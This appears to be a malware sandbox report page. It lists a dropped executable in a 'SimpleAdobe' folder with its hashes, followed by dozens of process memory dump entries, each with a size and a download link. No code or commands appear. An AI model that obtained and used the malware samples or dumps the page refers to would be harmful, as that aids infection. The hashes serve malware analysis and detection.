C:\Users\Admin\Documents\SimpleAdobe\tgi8pVfXS9AI5LvI0m2WqWHC.exe

Filesize
203KB

MD5
e4566b564aa2ea70b9ee606b05c7fc4c

SHA1
e44b2cb12ea3993e58646b1b3227cd421cf42fc8

SHA256
a865676207f8f729bdeb96d182a73c7c1fad01523f68829e52ab6fd06ff34dbf

SHA512
53bc08f72b4cc0cf1735d9c16a5697bcb18a85a423cd4408f78eba6586b50032c7d3ad2884c62bb02fdabca143a9b3b7bda5c85a14a7ec3b479e37d62e4c6a2a

Download Submit
memory/716-200-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1172-601-0x0000000005280000-0x00000000052E6000-memory.dmp

Filesize
408KB

Download
memory/1172-606-0x0000000005BC0000-0x0000000005F14000-memory.dmp

Filesize
3.3MB

Download
memory/1172-596-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/1172-595-0x0000000002BC0000-0x0000000002BF6000-memory.dmp

Filesize
216KB

Download
memory/1172-600-0x00000000050E0000-0x0000000005102000-memory.dmp

Filesize
136KB

Download
memory/1172-622-0x0000000006090000-0x00000000060AE000-memory.dmp

Filesize
120KB

Download
memory/1208-461-0x0000000000E60000-0x00000000013DA000-memory.dmp

Filesize
5.5MB

Download
memory/1208-462-0x0000000005C30000-0x0000000005D14000-memory.dmp

Filesize
912KB

Download
memory/1376-1466-0x0000000000690000-0x0000000000B49000-memory.dmp

Filesize
4.7MB

Download
memory/1376-432-0x0000000000690000-0x0000000000B49000-memory.dmp

Filesize
4.7MB

Download
memory/1384-670-0x00000000002D0000-0x0000000000320000-memory.dmp

Filesize
320KB

Download
memory/1556-1620-0x00000000001C0000-0x000000000087C000-memory.dmp

Filesize
6.7MB

Download
memory/1624-1300-0x0000000000D20000-0x000000000190C000-memory.dmp

Filesize
11.9MB

Download
memory/1624-221-0x0000000000D20000-0x000000000190C000-memory.dmp

Filesize
11.9MB

Download
memory/1900-1368-0x0000000000D50000-0x0000000001406000-memory.dmp

Filesize
6.7MB

Download
memory/1900-416-0x0000000000D50000-0x0000000001406000-memory.dmp

Filesize
6.7MB

Download
memory/2112-7-0x00007FF6C2670000-0x00007FF6C2E06000-memory.dmp

Filesize
7.6MB

Download
memory/2112-15-0x00007FF6C2670000-0x00007FF6C2E06000-memory.dmp

Filesize
7.6MB

Download
memory/2112-0-0x00007FF6C27D6000-0x00007FF6C29EF000-memory.dmp

Filesize
2.1MB

Download
memory/2112-1-0x00007FF84D010000-0x00007FF84D012000-memory.dmp

Filesize
8KB

Download
memory/2112-2-0x00007FF6C2670000-0x00007FF6C2E06000-memory.dmp

Filesize
7.6MB

Download
memory/2112-16-0x00007FF6C27D6000-0x00007FF6C29EF000-memory.dmp

Filesize
2.1MB

Download
memory/2112-4-0x00007FF6C2670000-0x00007FF6C2E06000-memory.dmp

Filesize
7.6MB

Download
memory/2112-455-0x00007FF6C27D6000-0x00007FF6C29EF000-memory.dmp

Filesize
2.1MB

Download
memory/2112-456-0x00007FF6C2670000-0x00007FF6C2E06000-memory.dmp

Filesize
7.6MB

Download
memory/2468-1456-0x00000000001C0000-0x000000000087C000-memory.dmp

Filesize
6.7MB

Download
memory/2468-418-0x00000000001C0000-0x000000000087C000-memory.dmp

Filesize
6.7MB

Download
memory/2612-1607-0x000002BAC53E0000-0x000002BAC5402000-memory.dmp

Filesize
136KB

Download
memory/2892-650-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3668-324-0x0000000000400000-0x0000000000797000-memory.dmp

Filesize
3.6MB

Download
memory/3668-323-0x0000000000400000-0x0000000000797000-memory.dmp

Filesize
3.6MB

Download
memory/3668-391-0x0000000000400000-0x0000000000797000-memory.dmp

Filesize
3.6MB

Download
memory/3808-400-0x0000000000400000-0x0000000000797000-memory.dmp

Filesize
3.6MB

Download
memory/3808-1367-0x0000000000400000-0x0000000000797000-memory.dmp

Filesize
3.6MB

Download
memory/3996-377-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-361-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-318-0x0000000005710000-0x000000000572C000-memory.dmp

Filesize
112KB

Download
memory/3996-329-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-330-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-332-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-334-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-336-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-338-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-340-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-342-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-344-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-346-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-309-0x00000000058B0000-0x00000000059F4000-memory.dmp

Filesize
1.3MB

Download
memory/3996-354-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-383-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-357-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-350-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-359-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-1269-0x0000000000550000-0x00000000005A2000-memory.dmp

Filesize
328KB

Download
memory/3996-363-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-352-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-244-0x0000000002FC0000-0x0000000002FDA000-memory.dmp

Filesize
104KB

Download
memory/3996-381-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-365-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-367-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-369-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-371-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-373-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-375-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-379-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-246-0x0000000005810000-0x00000000058AC000-memory.dmp

Filesize
624KB

Download
memory/3996-224-0x0000000000B10000-0x0000000000E3C000-memory.dmp

Filesize
3.2MB

Download
memory/3996-348-0x0000000005710000-0x0000000005725000-memory.dmp

Filesize
84KB

Download
memory/3996-1294-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/3996-1293-0x0000000005330000-0x00000000053A6000-memory.dmp

Filesize
472KB

Download
memory/4008-316-0x0000000000400000-0x000000000047A000-memory.dmp

Filesize
488KB

Download
memory/4412-1621-0x00000000005A0000-0x0000000000A5D000-memory.dmp

Filesize
4.7MB

Download
memory/4412-1630-0x00000000005A0000-0x0000000000A5D000-memory.dmp

Filesize
4.7MB

Download
memory/4464-1308-0x0000000000B70000-0x000000000102D000-memory.dmp

Filesize
4.7MB

Download
memory/4464-1327-0x0000000000B70000-0x000000000102D000-memory.dmp

Filesize
4.7MB

Download
memory/4472-1619-0x0000000000D50000-0x0000000001406000-memory.dmp

Filesize
6.7MB

Download
memory/4628-833-0x0000000000BB0000-0x0000000000DEC000-memory.dmp

Filesize
2.2MB

Download
memory/4628-1491-0x0000000000BB0000-0x0000000000DEC000-memory.dmp

Filesize
2.2MB

Download
memory/4684-1622-0x0000000000690000-0x0000000000B49000-memory.dmp

Filesize
4.7MB

Download
memory/4684-1628-0x0000000000690000-0x0000000000B49000-memory.dmp

Filesize
4.7MB

Download
memory/4692-1273-0x0000000000710000-0x0000000000776000-memory.dmp

Filesize
408KB

Download
memory/4764-395-0x0000000005E10000-0x00000000063B4000-memory.dmp

Filesize
5.6MB

Download
memory/4764-399-0x00000000058C0000-0x00000000058CA000-memory.dmp

Filesize
40KB

Download
memory/4764-308-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4764-397-0x0000000005900000-0x0000000005992000-memory.dmp

Filesize
584KB

Download
memory/4764-407-0x0000000005CC0000-0x0000000005DCA000-memory.dmp

Filesize
1.0MB

Download
memory/4764-412-0x0000000005B60000-0x0000000005B9C000-memory.dmp

Filesize
240KB

Download
memory/4764-406-0x00000000069E0000-0x0000000006FF8000-memory.dmp

Filesize
6.1MB

Download
memory/4764-749-0x0000000007510000-0x0000000007560000-memory.dmp

Filesize
320KB

Download
memory/4764-414-0x0000000005BF0000-0x0000000005C3C000-memory.dmp

Filesize
304KB

Download
memory/4764-409-0x0000000005B40000-0x0000000005B52000-memory.dmp

Filesize
72KB

Download
memory/4764-550-0x0000000006550000-0x00000000065B6000-memory.dmp

Filesize
408KB

Download
memory/4764-987-0x0000000007730000-0x00000000078F2000-memory.dmp

Filesize
1.8MB

Download
memory/4764-990-0x00000000085A0000-0x0000000008ACC000-memory.dmp

Filesize
5.2MB

Download
memory/5000-1618-0x00000000005A0000-0x0000000000A5D000-memory.dmp

Filesize
4.7MB

Download
memory/5000-1325-0x00000000005A0000-0x0000000000A5D000-memory.dmp

Filesize
4.7MB

Download
memory/5084-971-0x0000000000B60000-0x0000000000BB0000-memory.dmp

Filesize
320KB

Download
memory/5084-1652-0x00000000044D0000-0x0000000004824000-memory.dmp

Filesize
3.3MB

Download
memory/5092-212-0x0000000000FC0000-0x0000000001479000-memory.dmp

Filesize
4.7MB

Download
memory/5092-435-0x0000000000FC0000-0x0000000001479000-memory.dmp

Filesize
4.7MB

Download